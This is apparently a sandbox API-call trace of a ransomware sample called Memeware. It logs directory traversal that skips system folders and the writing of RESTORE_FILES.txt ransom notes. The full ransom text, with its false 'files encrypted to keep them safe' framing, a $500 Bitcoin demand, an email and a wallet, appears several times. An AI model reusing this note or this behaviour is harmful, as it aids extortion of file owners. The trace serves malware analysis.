[0078.058] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0078.058] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt") returned 160 [0078.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.058] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.058] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0078.059] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.059] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0078.059] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.059] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0078.060] CloseHandle (hObject=0x158) returned 1 [0078.060] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.060] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.061] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\RESTORE_FILES.txt") returned 105 [0078.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.061] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.061] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.062] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.062] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.062] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.062] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.062] CloseHandle (hObject=0x154) returned 1 [0078.062] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.062] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.062] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\RESTORE_FILES.txt") returned 92 [0078.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.063] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.063] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.064] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.064] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.064] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.064] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0078.064] CloseHandle (hObject=0x150) returned 1 [0078.064] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0078.064] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0078.064] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\RESTORE_FILES.txt") returned 79 [0078.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0078.064] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.064] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0078.065] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.065] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.065] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.065] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0078.065] CloseHandle (hObject=0x14c) returned 1 [0078.066] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="Windows") returned -1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="Program Files") returned -1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="Program Files (x86)") returned -1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="$Recycle.bin") returned 1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="System Volume Information") returned -1 [0078.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX") returned 69 [0078.066] lstrcmpW (lpString1="DQQ19BCJ.JAX", lpString2=".") returned 1 [0078.066] lstrcmpW (lpString1="DQQ19BCJ.JAX", lpString2="..") returned 1 [0078.066] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*") returned 71 [0078.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0078.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.067] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.067] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.067] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.067] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.067] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\.") returned 71 [0078.067] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.067] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.067] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.067] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.067] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.067] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.067] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\..") returned 72 [0078.067] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.067] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="Windows") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="Program Files") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="Program Files (x86)") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="$Recycle.bin") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="System Volume Information") returned 1 [0078.067] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT") returned 82 [0078.067] lstrcmpW (lpString1="YVORLGOR.PNT", lpString2=".") returned 1 [0078.067] lstrcmpW (lpString1="YVORLGOR.PNT", lpString2="..") returned 1 [0078.068] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*") returned 84 [0078.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.076] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.076] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.076] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.076] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.076] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.076] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\.") returned 84 [0078.076] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.076] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.076] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.076] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.076] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.076] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.076] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.076] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\..") returned 85 [0078.076] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.076] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.076] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="Windows") returned -1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="Program Files") returned -1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="Program Files (x86)") returned -1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="$Recycle.bin") returned 1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="System Volume Information") returned -1 [0078.076] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned 142 [0078.076] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2=".") returned 1 [0078.076] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="..") returned 1 [0078.076] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*") returned 144 [0078.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.077] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.077] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.077] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.077] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.077] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\.") returned 144 [0078.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.077] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.077] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.077] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.077] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.077] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.077] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.077] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\..") returned 145 [0078.077] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.078] lstrcmpW (lpString1="..", lpString2="..") returned 0 